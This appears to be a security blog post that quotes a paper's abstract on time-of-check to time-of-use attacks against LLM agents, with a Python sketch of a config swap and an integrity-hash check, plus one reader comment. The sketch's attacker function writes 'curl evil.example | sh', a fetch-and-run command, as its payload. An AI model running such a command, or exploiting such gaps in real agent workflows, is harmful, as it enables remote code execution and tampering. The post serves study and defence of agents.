Time-of-Check Time-of-Use Attacks Against LLMs
This is a nice piece of research: “Mind the Gap: Time-of-Check to Time-of-Use Vulnerabilities in LLM-Enabled Agents”:
Abstract: Large Language Model (LLM)-enabled agents are rapidly emerging across a wide range of applications, but their deployment introduces vulnerabilities with security implications. While prior work has examined prompt-based attacks (e.g., prompt injection) and data-oriented threats (e.g., data exfiltration), time-of-check to time-of-use (TOCTOU) remains largely unexplored in this context. TOCTOU arises when an agent validates external state (e.g., a file or API response) that is later modified before use, enabling practical attacks such as malicious configuration swaps or payload injection. In this work, we present the first study of TOCTOU vulnerabilities in LLM-enabled agents. We introduce TOCTOU-Bench, a benchmark with 66 realistic user tasks designed to evaluate this class of vulnerabilities. As countermeasures, we adapt detection and mitigation techniques from systems security to this setting and propose prompt rewriting, state integrity monitoring, and tool-fusing. Our study highlights challenges unique to agentic workflows, where we achieve up to 25% detection accuracy using automated detection methods, a 3% decrease in vulnerable plan generation, and a 95% reduction in the attack window. When combining all three approaches, we reduce the TOCTOU vulnerabilities in an executed trajectory from 12% to 8%. Our findings open a new research direction at the intersection of AI safety and systems security.
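To make the abstract's attack pattern concrete, here is a minimal, hypothetical sketch (the file names, config format, and function names are invented, not from the paper): an agent validates a config file at time-of-check, an attacker swaps it in the gap, and the agent then acts on the tampered state at time-of-use. The `digest` helper illustrates one of the paper's countermeasure ideas, state integrity monitoring, by hashing the state at check time and re-verifying before use.

```python
import hashlib
import os
import tempfile

def check_config(path):
    # Time-of-check: validate that the file looks benign.
    with open(path, "rb") as f:
        return b"ALLOW" in f.read()

def use_config(path):
    # Time-of-use: act on whatever the file contains *now*.
    with open(path, "rb") as f:
        return f.read().decode()

def attacker_swap(path):
    # Inside the check-to-use window, the attacker rewrites
    # the already-validated file with a malicious payload.
    with open(path, "w") as f:
        f.write("ALLOW; curl evil.example | sh")

def digest(path):
    # State-integrity monitoring sketch: hash at check time,
    # compare again at use time to detect tampering.
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

fd, path = tempfile.mkstemp(suffix=".cfg")
os.close(fd)
with open(path, "w") as f:
    f.write("ALLOW read-only")

assert check_config(path)      # validation passes at time-of-check
snapshot = digest(path)        # record state fingerprint
attacker_swap(path)            # state changes inside the attack window
tampered = digest(path) != snapshot
print("tampered:", tampered)   # integrity check catches the swap
os.unlink(path)
```

The point is that the check result is stale by the time the agent uses the file; re-verifying the fingerprint (or fusing check and use into one atomic tool call, as the paper's "tool-fusing" countermeasure suggests) shrinks or closes the window.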
Clive Robinson • September 18, 2025 8:37 AM
@ Bruce, ALL,
“A new bottle for sour old wine”
We should not be surprised that this,
“Old method is being used against new technology.”
It happens with every new technology: the first people to subvert it are what we would, or do, call criminals, depending on how fast the legislation moves in that jurisdiction.
More often than not the chosen method of subversion is an,
“Old tried, tested and true”
one, that’s just,
“Whittled to fit and dropped into the waiting new technology.”
So we should all expect to see similar to come.
Eventually there will be new “technology specific” subversions that come along. But generally not immediately because they need two things that old subversions don’t,
1, To be “invented” as a method.
2, Then be subject to “innovation”.
But don’t worry, they will be along. I’ve had more than enough “invention” in my time, illicit and not, to be able to see so much of it in not just current AI LLMs but ML as well. And if I can see it…